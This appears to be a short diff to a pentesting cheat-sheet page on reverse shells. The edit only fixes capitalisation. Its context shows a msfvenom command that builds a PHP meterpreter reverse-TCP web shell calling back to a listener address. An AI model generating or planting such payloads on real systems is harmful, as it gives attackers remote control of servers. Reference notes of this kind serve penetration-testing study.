xapax/security/reverse-shell.md

 ```

-## Web-shells - platform independent
+## Web-shells - Platform Independent

 ### PHP

 This php-shell is OS-independent.
-You can use it on both linux and windows.
+You can use it on both Linux and Windows.

 ```
 msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.101 LPORT=443 -f raw > shell.php